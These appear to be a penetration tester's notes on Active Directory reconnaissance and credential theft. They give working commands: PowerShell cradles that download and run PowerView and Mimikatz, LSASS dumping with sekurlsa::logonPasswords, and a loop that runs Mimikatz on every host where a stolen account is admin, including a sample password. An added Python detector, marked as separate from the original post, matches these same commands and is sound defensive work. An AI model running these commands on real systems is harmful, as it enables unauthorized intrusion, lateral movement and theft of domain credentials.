Windows: AD recon
Check logged on domain:
echo %userdnsdomain%
corp.google.com
whoami /fqdn
CN=Alex Turner(alturner),OU=User Policy 0,OU=All Users,DC=corp,DC=google,DC=DC=com
Net users randomname /domain
The request will be processed at a domain controller for domain CORP.google.com.
Find administrators on the machine
net localgroup administrators
Administrator
corp\Domain Admins
corp\Local-Workstation-Admins
corp\alturner
corp\l-support
Find the domain controller you authenticated to
echo %logonserver%
\\GCBBKDCCORP001
List all domain controllers
nltest /dclist:corp.google.com
Show password policy
Net accounts
Check the domain audit policy pushed to the system
auditpol.exe /get /category:*
gpresult /H test.html
gpresult /R
Gpresult /Z
Find All domain Admins
Identify the domain admin group (for now let's call it "DomAdmins"), then run:
net group "DomAdmins" /domain
Include PowerView in PowerShell
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1")
Include Invoke-MassMimikatz-PsRemoting
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Invoke-MassMimikatz-PsRemoting.psm1")
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1")
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1")
Suppose we have compromised a system in the domain with admin privileges. Let us assume that account is "corp\alturner". Now we can get the password for this by using Mimikatz.
Using Invoke-Mimikatz it can be done as:
> Invoke-Mimikatz
This will dump your password on screen if you have admin privileges on the system.
Now we can try to move laterally on the network by trying to find all the machines where our compromised account has admin privileges.
Load PowerView, then:
> Invoke-FindLocalAdminAccess > admin.txt
This dumps the machine names into the admin.txt text file.
Now we can use this output to invoke Mimikatz on the systems found to harvest more credentials. Ideally we could have used "Invoke-MassMimikatz-PsRemoting" to do this with:
Invoke-MassMimikatz-PsRemoting -Verbose -HostList C:\Users\mightlord\admin.txt
But I could not get this to work, so we used a jugaad (workaround) here:
Get-Content -Path .\admin.txt | ForEach-Object {Invoke-MassMimikatz-PsRemoting -Hosts $_.ToString() -Verbose -username "corp\alturner" -password "happybunny"}
In case Invoke-Mimikatz is not able to inject into lsass.exe, dump the process memory to disk and point Mimikatz at the minidump like this:
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump C:\Path\lsass.dmp" "sekurlsa::logonPasswords"'
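A defender-side counterpart to the recon commands above and the Mimikatz steps that follow, added here as an example that is not part of the original post: it scans constructed process-creation records (fields modelled on Security event 4688 / Sysmon event 1) and raises one "recon-burst" alert when a single host runs several distinct AD recon commands within ten minutes, plus a "cred-access" alert for any download cradle or LSASS-dumping command line. Host names, users, timestamps and the URL in the sample are constructed; the thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Case-insensitive regexes over the CommandLine field of a process-creation record.
RECON_PATTERNS = [
    r"\bnltest(\.exe)?\s+/dclist",
    r"\bnet1?(\.exe)?\s+(users?|group)\b.*\s/domain\b",
    r"\bnet1?(\.exe)?\s+(localgroup\s+administrators|accounts)\b",
    r"\bwhoami(\.exe)?\s+/fqdn",
    r"\bauditpol(\.exe)?\s+/get",
    r"\bgpresult(\.exe)?\s+/[hrz]\b",
]
CRED_PATTERNS = [
    r"downloadstring\s*\(",                                            # in-memory download cradle
    r"invoke-(mass)?mimikatz|sekurlsa::|privilege::debug|lsass\.dmp",  # LSASS credential dumping
]

def classify(cmdline):
    """Return the set of matched indicators as (kind, pattern_index) tuples."""
    groups = (("recon", RECON_PATTERNS), ("cred", CRED_PATTERNS))
    return {(kind, i) for kind, pats in groups
            for i, p in enumerate(pats) if re.search(p, cmdline, re.IGNORECASE)}

def detect(records, window=timedelta(minutes=10), min_recon=3):
    """records: (timestamp 'YYYY-MM-DD HH:MM:SS', host, user, cmdline) tuples.
    One 'recon-burst' alert per host that runs >= min_recon distinct recon commands
    inside `window`; a 'cred-access' alert for every cradle/Mimikatz command line."""
    alerts, recent, flagged = [], defaultdict(list), set()   # recent: host -> [(time, idx)]
    for ts, host, user, cmd in sorted(records):
        t = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
        for kind, idx in classify(cmd):
            if kind == "cred":
                alerts.append(("cred-access", host, user, cmd))
                continue
            recent[host] = [(tt, i) for tt, i in recent[host] if t - tt <= window] + [(t, idx)]
            if host not in flagged and len({i for _, i in recent[host]}) >= min_recon:
                flagged.add(host)
                alerts.append(("recon-burst", host, user, cmd))
    return alerts

# Constructed sample records (not real telemetry); the lone gpresult on WKS02 stays silent.
SAMPLE = [
    ("2024-01-05 09:00:01", "WKS01", "corp\\alturner", "whoami /fqdn"),
    ("2024-01-05 09:00:20", "WKS01", "corp\\alturner", "nltest /dclist:corp.google.com"),
    ("2024-01-05 09:01:05", "WKS01", "corp\\alturner", 'net group "Domain Admins" /domain'),
    ("2024-01-05 09:03:00", "WKS02", "corp\\helpdesk", "gpresult /R"),
    ("2024-01-05 09:10:00", "WKS01", "corp\\alturner",
     "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://EXAMPLE-HOST/pv.ps1')"),
]
```

Calling `detect(SAMPLE)` yields a recon-burst alert for WKS01 at the third recon command and a cred-access alert for the download cradle; a single admin running one `gpresult` does not trip it.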
References:
http://blackpentesters.blogspot.in/2016/08/retrieve-passwords-from-lsass-via.html
https://www.youtube.com/watch?v=rknpKIxT7NM&t=1501s
https://www.youtube.com/watch?v=gajEuuC2-Dk&list=LLawkOb2Rd0Ha8YuW8i39nDA&index=2&t=2429s